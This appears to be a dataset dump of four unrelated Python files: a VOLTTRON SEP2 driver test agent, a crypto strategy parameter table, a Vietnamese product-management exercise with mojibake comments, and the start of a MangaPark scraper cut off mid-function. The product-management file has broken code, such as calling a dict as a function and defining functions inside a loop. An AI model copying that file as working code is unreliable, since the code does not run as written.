9b993cbfd369e7ff3ce902afd7a151cb5a0aeeec | ed79ce1f816daf0e9b27092a0cfdd24ed727994b | /services/core/SEP2Agent/tests/SEP2DriverTestAgent/test_agent/agent.py | 2b5e12e0e750b2908708cc6e80a8ec1eab675204 | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | cbs-iiith/volttron | ca00430c5c89f612fbf8fedc7c65fb90cae16ee3 | a676d4af19a808581dde172ab08820087854e157 | refs/heads/dev-cbs-iiith | 2022-09-11T03:35:59.311254 | 2020-01-21T10:29:57 | 2020-01-21T10:29:57 | 59,084,828 | 2 | 0 | NOASSERTION | 2020-01-21T10:33:38 | 2016-05-18T05:31:50 | Python | UTF-8 | Python | false | false | 16,826 | py | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2017, SLAC National Laboratory / Kisensum Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor SLAC / Kisensum,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# SLAC / Kisensum. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# }}}
import gevent
import logging
import requests
import sys
from volttron.platform.vip.agent import Agent, Core
from volttron.platform.agent import utils
from volttron.platform.agent.known_identities import PLATFORM_DRIVER
_log = logging.getLogger(__name__)
utils.setup_logging()
__version__ = '1.0'
CYCLE_TIME = 3 # Seconds between sets of get_point/set_point calls
ALL_POINTS = [
'b1_Md',
'b1_Opt',
'b1_SN',
'b1_Vr',
'b113_A',
'b113_DCA',
'b113_DCV',
'b113_DCW',
'b113_PF',
'b113_WH',
'b120_AhrRtg',
'b120_ARtg',
'b120_MaxChaRte',
'b120_MaxDisChaRte',
'b120_WHRtg',
'b120_WRtg',
'b121_WMax',
'b122_ActWh',
'b122_StorConn',
'b124_WChaMax',
'b403_Tmp',
'b404_DCW',
'b404_DCWh',
'b802_LocRemCtl',
'b802_SoC',
'b802_State']
DEVICE_INFORMATION = """<DeviceInformation xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<functionsImplemented>0145</functionsImplemented>
<lFDI>5509D69F8B353595206AD71B47E27906318EA367</lFDI>
<mfDate>1388566800</mfDate>
<mfHwVer>MF-HW: 1.0.0</mfHwVer>
<mfID>37250</mfID>
<mfInfo>Mf Information</mfInfo>
<mfModel>Mf Model</mfModel>
<mfSerNum>1234567890</mfSerNum>
<primaryPower>2</primaryPower>
<secondaryPower>0</secondaryPower>
<swActTime>1416107035</swActTime>
<swVer>9bc8e7b_modified</swVer>
</DeviceInformation>
"""
DER_SETTINGS = """<DERSettings xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<setGradW>55000</setGradW>
<setMaxChargeRate>
<multiplier>1</multiplier>
<value>2</value>
</setMaxChargeRate>
<setMaxDischargeRate>
<multiplier>3</multiplier>
<value>4</value>
</setMaxDischargeRate>
<setMaxW>
<multiplier>1</multiplier>
<value>1</value>
</setMaxW>
<setStorConnect>true</setStorConnect>
<updatedTime>1416307137</updatedTime>
</DERSettings>"""
DER_STATUS = """<DERStatus xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<readingTime>1416270124</readingTime>
<stateOfChargeStatus>
<dateTime>1416270124</dateTime>
<value>777</value>
</stateOfChargeStatus>
<inverterStatus>
<dateTime>1416270124</dateTime>
<value>777</value>
</inverterStatus>
<storConnectStatus>
<dateTime>1416270124</dateTime>
<value>777</value>
</storConnectStatus>
<localControlModeStatus>
<dateTime>1416270124</dateTime>
<value>777</value>
</localControlModeStatus>
</DERStatus>"""
DER_AVAILABILITY = """<DERAvailability xmlns="http://zigbee.org/sep">
<availabilityDuration>55036</availabilityDuration>
<maxChargeDuration>3</maxChargeDuration>
<readingTime>1416304442</readingTime>
<reserveChargePercent>10000</reserveChargePercent>
<reservePercent>10000</reservePercent>
<statWAvail>
<multiplier>1</multiplier>
<value>1</value>
</statWAvail>
</DERAvailability>"""
DER_CAPABILITY = """<DERCapability xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<modesSupported>01</modesSupported>
<rtgAh>
<multiplier>1</multiplier>
<value>35</value>
</rtgAh>
<rtgA>
<multiplier>1</multiplier>
<value>33</value>
</rtgA>
<rtgMaxChargeRate>
<multiplier>1</multiplier>
<value>22</value>
</rtgMaxChargeRate>
<rtgMaxDischargeRate>
<multiplier>1</multiplier>
<value>1</value>
</rtgMaxDischargeRate>
<rtgMinPF>
<multiplier>1</multiplier>
<value>1</value>
</rtgMinPF>
<rtgW>
<multiplier>1</multiplier>
<value>1</value>
</rtgW>
<rtgWh>
<multiplier>1</multiplier>
<value>123</value>
</rtgWh>
<type>85</type>
</DERCapability>"""
POWER_STATUS = """<PowerStatus xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<batteryStatus>0</batteryStatus>
<changedTime>1416266598</changedTime>
<currentPowerSource>3</currentPowerSource>
<estimatedChargeRemaining>1</estimatedChargeRemaining>
<estimatedTimeRemaining>0</estimatedTimeRemaining>
<PEVInfo>
<chargingPowerNow>
<multiplier>0</multiplier>
<value>3000</value>
</chargingPowerNow>
<energyRequestNow>
<multiplier>0</multiplier>
<value>6100</value>
</energyRequestNow>
<maxForwardPower>
<multiplier>3</multiplier>
<value>7</value>
</maxForwardPower>
<minimumChargingDuration>4337</minimumChargingDuration>
<targetStateOfCharge>1000</targetStateOfCharge>
<timeChargeIsNeeded>1516266598</timeChargeIsNeeded>
<timeChargingStatusPEV>1516266598</timeChargingStatusPEV>
</PEVInfo>
<sessionTimeOnBattery>2</sessionTimeOnBattery>
<totalTimeOnBattery>2</totalTimeOnBattery>
</PowerStatus>"""
MUP = """<MirrorUsagePoint xmlns="http://zigbee.org/sep">
<mRID>0600006CC8</mRID>
<description>Gas Mirroring</description>
<roleFlags>13</roleFlags>
<serviceCategoryKind>1</serviceCategoryKind>
<status>1</status>
<deviceLFDI>247bd68e3378fe57ba604e3c8bdf9e3f78a3d743</deviceLFDI>
<MirrorMeterReading>
<mRID>0700006CC8</mRID>
<description>Cumulative Reading for Gas</description>
<Reading>
<value>125</value>
</Reading>
<ReadingType>
<accumulationBehaviour>9</accumulationBehaviour>
<commodity>7</commodity>
<dataQualifier>0</dataQualifier>
<flowDirection>1</flowDirection>
<powerOfTenMultiplier>3</powerOfTenMultiplier>
<uom>119</uom>
</ReadingType>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>0800006CC8</mRID>
<description>Interval Readings for Gas</description>
<ReadingType>
<accumulationBehaviour>4</accumulationBehaviour>
<commodity>7</commodity>
<dataQualifier>0</dataQualifier>
<flowDirection>1</flowDirection>
<powerOfTenMultiplier>3</powerOfTenMultiplier>
<uom>119</uom>
</ReadingType>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>0900006CC8</mRID>
<description>InstantPackCurrent</description>
<Reading>
<value>125</value>
</Reading>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>0900006CC8</mRID>
<description>LineVoltageAvg</description>
<Reading>
<value>125</value>
</Reading>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>0900006CC8</mRID>
<description>PhasePowerAvg</description>
<Reading>
<value>125</value>
</Reading>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>1000006CC8</mRID>
<description>PhasePFA</description>
<Reading>
<value>126</value>
</Reading>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>1100006CC8</mRID>
<description>EnergyIMP</description>
<Reading>
<value>127</value>
</Reading>
</MirrorMeterReading>
<MirrorMeterReading>
<mRID>1300006CC8</mRID>
<description>InstantPackTemp</description>
<Reading>
<value>128</value>
</Reading>
<ReadingType>
<accumulationBehaviour>9</accumulationBehaviour>
<commodity>7</commodity>
<dataQualifier>0</dataQualifier>
<flowDirection>1</flowDirection>
<powerOfTenMultiplier>3</powerOfTenMultiplier>
<uom>119</uom>
</ReadingType>
</MirrorMeterReading>
</MirrorUsagePoint>"""
MUP2 = """<MirrorUsagePoint xmlns="http://zigbee.org/sep">
<mRID>0600006CC8</mRID>
<description>Gas Mirroring</description>
<roleFlags>13</roleFlags>
<serviceCategoryKind>1</serviceCategoryKind>
<status>1</status>
<deviceLFDI>247bd68e3378fe57ba604e3c8bdf9e3f78a3d743</deviceLFDI>
<MirrorMeterReading>
<mRID>1200006CC8</mRID>
<description>EnergyEXP</description>
<Reading>
<value>128</value>
</Reading>
</MirrorMeterReading>
</MirrorUsagePoint>"""
MMR = """<MirrorMeterReading xmlns="http://zigbee.org/sep" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<mRID>6D6D72099BBDE9156400000000009182</mRID>
<description>PhaseCurrentAvg</description>
<Reading subscribable="0">
<timePeriod>
<duration>0</duration>
<start>2216441</start>
</timePeriod>
<value>24</value>
</Reading>
<ReadingType>
<accumulationBehaviour>12</accumulationBehaviour>
<commodity>0</commodity>
<dataQualifier>12</dataQualifier>
<flowDirection>0</flowDirection>
<kind>0</kind>
<phase>0</phase>
<powerOfTenMultiplier>0</powerOfTenMultiplier>
<uom>23</uom>
</ReadingType>
</MirrorMeterReading>"""
ASSERTED_VALUES = {
'b1_Md': 'Mf Model',
'b1_Opt': '247bd68e3378fe57ba604e3c8bdf9e3f78a3d743',
'b1_SN': '097935300833',
'b1_Vr': 'MF-HW: 1.0.0',
'b113_A': '24.0',
'b113_DCA': '125.0',
'b113_DCV': '125.0',
'b113_DCW': '125.0',
'b113_PF': '126.0',
'b113_WH': '127.0',
'b120_AhrRtg': '350.0',
'b120_ARtg': '330.0',
'b120_MaxChaRte': '220.0',
'b120_MaxDisChaRte': '10.0',
'b120_WHRtg': '1230.0',
'b120_WRtg': '10.0',
'b121_WMax': '20.0',
'b122_ActWh': '128.0',
'b122_StorConn': '777',
'b124_WChaMax': '10.0',
'b403_Tmp': '128000.0',
'b404_DCW': '3000.0',
'b404_DCWh': '305.755555556',
'b802_LocRemCtl': '777',
'b802_SoC': '7.77',
'b802_State': '777'}
TEST_WEB_ADDRESS = 'http://127.0.0.1:8080'
DEFAULT_DRIVER = 'sep2_1'
class SEP2DriverTestAgent(Agent):
"""
Test the SEP2 driver (not a pytest regression test).
Load a test data set by posting XML to SEP2Agent (assumed to be at port 8080 on the local host).
Periodically send get_point for each point on the SEP2 driver.
Also send a set_point call to its der_control point, setting a power dispatch value.
This agent can be installed as follows:
export VIP_SOCKET="ipc://$VOLTTRON_HOME/run/vip.socket"
export SEP2_TEST_ROOT=$VOLTTRON_ROOT/services/core/SEP2Agent/tests/SEP2DriverTestAgent/test_agent
cd $VOLTTRON_ROOT
python scripts/install-agent.py \
-s $SEP2_TEST_ROOT \
-i sep2testagent \
-c $SEP2_TEST_ROOT/sep2drivertest.config \
-t sep2testagent \
-f
"""
def __init__(self, **kwargs):
super(SEP2DriverTestAgent, self).__init__(**kwargs)
self.default_config = {}
self.vip.config.set_default("config", self.default_config)
self.vip.config.subscribe(self.configure, actions=["NEW", "UPDATE"], pattern="config")
def configure(self, config_name, action, contents):
config = self.default_config.copy()
config.update(contents)
@Core.receiver('onstart')
def onstart(self, sender, **kwargs):
self.core.spawn(self.send_and_receive_points)
def send_and_receive_points(self):
self.post_test_data()
while True:
self.set_point('b124_WChaMax', ASSERTED_VALUES['b124_WChaMax'])
for point_name in ALL_POINTS:
expected_value = ASSERTED_VALUES[point_name]
received_value = self.get_point(point_name)
assert received_value == expected_value
gevent.sleep(CYCLE_TIME)
@staticmethod
def post_test_data():
"""Post XML test data for a SEP2 resource to the SEP2Agent."""
headers = {'content-type': 'application/sep+xml'}
requests.post('{}/dcap/edev/0/di'.format(TEST_WEB_ADDRESS), data=DEVICE_INFORMATION, headers=headers)
requests.post('{}/dcap/edev/0/der/1/derg'.format(TEST_WEB_ADDRESS), data=DER_SETTINGS, headers=headers)
requests.post('{}/dcap/edev/0/der/1/ders'.format(TEST_WEB_ADDRESS), data=DER_STATUS, headers=headers)
requests.post('{}/dcap/edev/0/der/1/dera'.format(TEST_WEB_ADDRESS), data=DER_AVAILABILITY, headers=headers)
requests.post('{}/dcap/edev/0/der/1/dercap'.format(TEST_WEB_ADDRESS), data=DER_CAPABILITY, headers=headers)
requests.post('{}/dcap/edev/0/ps'.format(TEST_WEB_ADDRESS), data=POWER_STATUS, headers=headers)
requests.post('{}/dcap/mup'.format(TEST_WEB_ADDRESS), data=MUP, headers=headers)
requests.post('{}/dcap/mup/0'.format(TEST_WEB_ADDRESS), data=MUP2, headers=headers)
requests.post('{}/dcap/mup/0'.format(TEST_WEB_ADDRESS), data=MMR, headers=headers)
def get_point(self, point_name, driver_name=None):
"""Issue a get_point RPC call for the named point and return the result."""
driver = driver_name if driver_name else DEFAULT_DRIVER
response = self.vip.rpc.call(PLATFORM_DRIVER, 'get_point', driver, point_name).get(timeout=10)
_log.debug('{}: Sent get_point for {}, received {}'.format(driver, point_name, response))
return response
def set_point(self, point_name, value, driver_name=None):
"""Issue a set_point RPC call for the named point and value, and return the result."""
driver = driver_name if driver_name else DEFAULT_DRIVER
self.vip.rpc.call(PLATFORM_DRIVER, 'set_point', driver, point_name, value)
_log.debug('{}: Sent set_point for {} = {}'.format(driver, point_name, value))
def test_sep2_agent(config_path, **kwargs):
return SEP2DriverTestAgent(**kwargs)
def main():
utils.vip_main(test_sep2_agent, identity='sep2testagent', version=__version__)
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| [
"[email protected]"
] | |
dd68c7efbbedecd20d7e2eff84b6e32ac1718b24 | 1065a2782e4947b5bf14ec4536e4ad7addc7aec3 | /strategy/crystalball/cbparameters.py | 8c14b84a9ff8bc41f5a523fbe7de690157eb87d1 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | Johannesduvenage/siis | 0bf6875d4a5f3638cadb01ed5541aab29ba1d77a | 57e537cf9b6a71c8ad0b3bb0759772d126496a17 | refs/heads/master | 2020-09-10T21:51:56.814014 | 2019-11-13T23:57:34 | 2019-11-13T23:57:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,831 | py | # @date 2019-01-19
# @author Frederic SCHERMA
# @license Copyright (c) 2019 Dream Overflow
# Crystal ball strategy indicator default parameters.
DEFAULT_PARAMS = {
"reversal": True,
"pyramided": 0,
"hedging": False,
"max-trades": 3, # max number of simultaned trades for a same market
"trade-delay": 30, # at least wait 30 seconds before sending another signal
"base-timeframe": "t", # process each time strategy receive a tick
"min-traded-timeframe": "1m",
"max-traded-timeframe": "4h",
"min-vol24h": 100, # 300 BTC per 24h
"min-price": 0.00000069, # or 69 sats (to binary otherwise)
"timeframes": {
"4hour": {
"timeframe": "4h",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": False,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 1.0), # was 1.5 , but too large else
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
},
"hourly": {
"timeframe": "1h",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": False,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 1.0), # was 1.5 , but too large else
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
},
"15min": {
"timeframe": "15m",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": False,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 1.0),
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
},
"5min": {
"timeframe": "5m",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": False,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 3.0),
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
},
"2min":{
"timeframe": "2m",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": False,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 3.0),
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
},
"1min": {
"timeframe": "1m",
"mode": "A",
"depth": 22,
"history": 22,
"update-at-close": True,
"signal-at-close": True,
"indicators": {
"price": ("price", 2,),
"volume": ("volume", 0,),
"rsi": ("rsi", 21,),
"pivotpoint": ("pivotpoint", 5,),
"tomdemark": ("tomdemark", 9),
"atr": ("atr", 14, 3.0),
"bbawe": ("bbawe", 20, 2.0, 3.0, 5, 34, False),
},
"constants": {
"rsi_low": 0.3,
"rsi_high": 0.7,
}
}
}
}
| [
"[email protected]"
] | |
f8c640ad9578ce1e96ba5f59ec9a5fe0ccec315b | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project/.history/product_20211028131744.py | 21593a603e8e73c799d5612010a2ae348848b646 | [] | no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 9,428 | py | import data as list_product
import random
# def __init__(self, Id, Product_code, Product_name, Brand, Year, Size):
# self.Id = Id
# self.Product_code = Product_code
# self.Product_name = Product_name
# self.Brand = Brand
# self.Year = Year
# self.Size = Size
# Thรชm sแบฃn phแบฉm
def AddProduct():
print("THรM SแบขN PHแบจM")
product = {
"Id": "",
"Product_code": "",
"Product_name": "",
"Brand": "",
"Price": "",
"Year": "",
"Quantity": "",
"Size": "",
"Status": ""
}
pd = product("g", "chs333", "Truyแปn bแบฃy viรชn ngแปc rแปng",
"3", "", 2, 2, "g", "f")
print("Nhแบญp ID sแบฃn phแบฉm:")
Id = int(input())
while True:
student = FindProductDuplicate(Id)
if student != False:
print("ID ฤรฃ tแปn tแบกi, vui lรฒng nhแบญp lแบกi ID:")
Id = int(input())
else:
break
product['Id'] = Id
# Mรฃ sแบฃn phแบฉm random
code_product = random.randint(1, 99)
str_id = "HKSP"
if code_product <= 9:
str_id += "0" + str(code_product)
else:
str_id += str(code_product)
product["Product_code"] = str_id
print("Nhแบญp tรชn sแบฃn phแบฉm: ")
product['Product_name'] = input()
print("Nhแบญp thฦฐฦกng hiแปu sแบฃn phแบฉm: ")
product['Brand'] = input()
print("Nhแบญp giรก sแบฃn phแบฉm: ")
product['Price'] = float(input())
print("Nhแบญp nฤm sแบฃn xuแบฅt: ")
product['Year'] = int(input())
print("Nhแบญp sแป lฦฐแปฃng: ")
product['Quantity'] = int(input())
print("Nhแบญp size giร y: ")
product['Size'] = input()
print("Nhแบญp tรฌnh trแบกng sแบฃn phแบฉm: ")
product['Status'] = input()
list_product.list_product.append(pd)
list_product.list_product.append(product)
answer = input("Bแบกn cรณ muแปn nhแบญp tiแบฟp khรดng? Y/N ")
if answer == "y" or answer == "Y":
AddProduct()
print("********************************")
# Tรฌm kiแบฟm ID trรนng lแบทp
def FindProductDuplicate(Id):
for i in range(0, len(list_product.list_product)):
if list_product.list_product[i]['Id'] == Id:
return [i, list_product.list_product[i]]
return False
# Hiแปn thแป tแบฅt cแบฃ sแบฃn phแบฉm
def ShowAllProduct():
print("*** HIแปN THแป TแบคT Cแบข SแบขN PHแบจM ***")
if len(list_product.list_product) == 0 or len(list_product.list_product) < 0:
print("Chฦฐa cรณ sแบฃn phแบฉm nร o ฤแป hiแปn thแป! ".upper())
for i in range(0, len(list_product.list_product)):
print("ID : \t", list_product.list_product[i]['Id']),
print("Mรฃ sแบฃn phแบฉm : \t", list_product.list_product[i]['Product_code']),
print("Tรชn sแบฃn phแบฉm : \t", list_product.list_product[i]['Product_name']),
print("Thฦฐฦกng hiแปu : \t", list_product.list_product[i]['Brand']),
print("Giรก : \t", list_product.list_product[i]['Price']),
print("Nฤm xuแบฅt bแบฃn : \t", list_product.list_product[i]['Year']),
print("Sแป lฦฐแปฃng : \t", list_product.list_product[i]['Quantity']),
print("Size giร y : \t", list_product.list_product[i]['Size'])
print("Tรฌnh trแบกng : \t", list_product.list_product[i]['Status'])
print("________________________________")
# Sแปญa thรดng tin sแบฃn phแบฉm
def UpdateProduct():
print("*** CแบฌP NHแบฌT THรNG TIN SแบขN PHแบจM ***")
print("Nhแบญp ID sแบฃn phแบฉm cแบงn sแปญa")
Id = int(input())
product = FindProductDuplicate(Id)
if product == False:
print("Khรดng tรฌm thแบฅy sแบฃn phแบฉm ID = ".upper(), Id)
print("********************************")
else:
print("""Bแบกn muแปn cแบญp nhแบญt mแปฅc nร o ? :
0. Thoรกt.
1. Tรชn sแบฃn phแบฉm.
2. Thฦฐฦกng hiแปu sแบฃn phแบฉm.
3. Giรก sแบฃn phแบฉm
4. Size giร y.
5. Sแป lฦฐแปฃng.
6. Nฤm xuแบฅt bแบฃn.
7. Tรฌnh trแบกng """)
action = 0
while action >= 0:
if action == 1:
UpdateProductName()
elif action == 2:
UpdateProductBrand()
elif action == 3:
UpdateProductPrice()
elif action == 4:
UpdateProductSize()
elif action == 5:
UpdateProductQuatity()
elif action == 6:
UpdateProductYear()
elif action == 7:
UpdateStatus()
def UpdateProductName():
print("Nhแบญp tรชn cแบญp nhแบญt cแปงa sแบฃn phแบฉm: ")
name_product = input()
product[1]['Product_name'] = name_product
def UpdateProductBrand():
print("Nhแบญp thฦฐฦกng hiแปu muแปn cแบญp nhแบญt: ")
name_product = input()
product[1]['Brand'] = name_product
def UpdateProductPrice():
print("Nhแบญp giรก muแปn cแบญp nhแบญt: ")
name_product = float(input())
product[1]['Price'] = name_product
def UpdateProductSize():
print("Nhแบญp size muแปn cแบญp nhแบญt: ")
name_product = input()
product[1]['Size'] = name_product
def UpdateProductYear():
print("Nhแบญp nฤm sแบฃn xuแบฅt muแปn cแบญp nhแบญt: ")
name_product = int(input())
product[1]['Year'] = name_product
list_product.list_product[product[0]] = product[1]
def UpdateProductQuatity():
print("Nhแบญp sแป lฦฐแปฃng muแปn cแบญp nhแบญt: ")
name_product = int(input())
product[1]['Quantity'] = name_product
list_product.list_product[product[0]] = product[1]
def UpdateStatus():
print("Nhแบญp tรฌnh trแบกng muแปn cแบญp nhแบญt: ")
name_product = input()
product[1]['Status'] = name_product
list_product.list_product[product[0]] = product[1]
action = int(input("Bแบกn chแปn mแปฅc cแบญp nhแบญt nร o? "))
if action == 0:
print("Khรดng cแบญp nhแบญt mแปฅc nร o".upper())
print("********************************")
break
# Xรณa sแบฃn phแบฉm
def DeleteProduct():
print("*** XรA SแบขN PHแบจM ***")
print("Nhแบญp ID sแบฃn phแบฉm cแบงn xรณa:")
Id = int(input())
product = FindProductDuplicate(Id)
if product == False:
print("Khรดng tรฌm thแบฅy sแบฃn phแบฉm ID = ".upper(), Id)
print("********************************")
else:
answer = input("Bแบกn cรณ muแปn xรณa sแบฃn phแบฉm nร y khรดng? Y/N ".upper())
if answer == "y" or answer == "Y":
if product != False:
list_product.list_product.remove(product[1])
print("Xรณa sแบฃn phแบฉm thร nh cรดng!".upper())
print("********************************")
else:
print("ฤรฃ tแปซ chแปi xรณa sแบฃn phแบฉm nร y!".upper())
print("********************************")
# Tรฌm kiแบฟm sแบฃn phแบฉm
def FindProductByName():
print("*** TรM KIแบพM SแบขN PHแบจM ***")
if (len(list_product.list_product) == 0 or len(list_product.list_product) < 0):
print("Chฦฐa cรณ sแบฃn phแบฉm nร o trong giแป!".upper())
print("********************************")
else:
NameProduct = str(
input("Nhแบญp tรชn sแบฃn phแบฉm hoแบทc tรชn thฦฐฦกng hiแปu bแบกn muแปn tรฌm kiแบฟm: ")).upper()
is_found = False
for i in range(0, len(list_product.list_product)):
if str(list_product.list_product[i]['Product_name']).upper() in NameProduct or str(list_product.list_product[i]['Brand']).upper() in NameProduct:
is_found = True
print("ID : \t", list_product.list_product[i]['Id']),
print("Mรฃ sแบฃn phแบฉm : \t",
list_product.list_product[i]['Product_code']),
print("Tรชn sแบฃn phแบฉm : \t",
list_product.list_product[i]['Product_name']),
print("Thฦฐฦกng hiแปu : \t", list_product.list_product[i]['Brand']),
print("Giรก : \t", list_product.list_product[i]['Price']),
print("Nฤm xuแบฅt bแบฃn : \t", list_product.list_product[i]['Year']),
print("Sแป lฦฐแปฃng : \t", list_product.list_product[i]['Quantity']),
print("Size giร y : \t", list_product.list_product[i]['Size'])
print("Tรฌnh trแบกng : \t", list_product.list_product[i]['Status'])
print("________________________________")
if not is_found:
print("Khรดng tรฌm thแบฅy sแบฃn phแบฉm nร y @@".upper())
print("********************************")
def SortProductNameA_Z():
list_product.list_product.sort(key=lambda item: item.get("Product_name"))
def SortProductNameZ_A():
list_product.list_product.sort(
key=lambda item: item.get("Product_name"), reverse=True)
def SortPriceAsc():
list_product.list_product.sort(key=lambda item: item.get("Price"))
def SortPriceDesc():
list_product.list_product.sort(
key=lambda item: item.get("Price"), reverse=True)
| [
"[email protected]"
] | |
09402cd9cb8b46c4bea215f5fb80144e37a7266b | 045025f41201dba54c005dd0601d97ccdedf3062 | /ScrapePlugins/MangaPark/FeedLoader.py | fd8b09f1220b87bdd841d7a1030882891c7728a3 | [] | no_license | Gazzilow/MangaCMS | 6720c45c63c0429cc0e0a37d99738bfb553ca98b | e620bfef62c9b3d4678b635a2ea6463ffb26fc34 | refs/heads/master | 2021-01-22T09:40:17.277953 | 2015-12-19T21:33:25 | 2015-12-19T21:33:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,396 | py |
import webFunctions
import bs4
import re
import urllib.parse
import time
import calendar
import dateutil.parser
import runStatus
import settings
import datetime
import ScrapePlugins.RetreivalDbBase
class FeedLoader(ScrapePlugins.RetreivalDbBase.ScraperDbBase):
loggerPath = "Main.Manga.Mp.Fl"
pluginName = "MangaPark Link Retreiver"
tableKey = "mp"
dbName = settings.dbName
wg = webFunctions.WebGetRobust(logPath=loggerPath+".Web")
tableName = "MangaItems"
urlBase = "http://mangapark.com/"
feedUrl = "http://mangapark.com/latest"
def closeDB(self):
self.log.info( "Closing DB...",)
self.conn.close()
self.log.info( "done")
def checkMatureAgree(self, page, url):
if "This series contains mature contents" in page:
self.log.info("Need to step through mature agreement page.")
page = self.wg.getpage(url, postData={"adult" : "true"})
return page
def getItemPages(self, info):
url, series = info
# print("Should get item for ", url)
page = self.wg.getpage(url)
page = self.checkMatureAgree(page, url)
soup = bs4.BeautifulSoup(page)
series = soup.find("h1", class_="title")
container = soup.find("div", class_="list")
seriesName = series.get_text().strip()
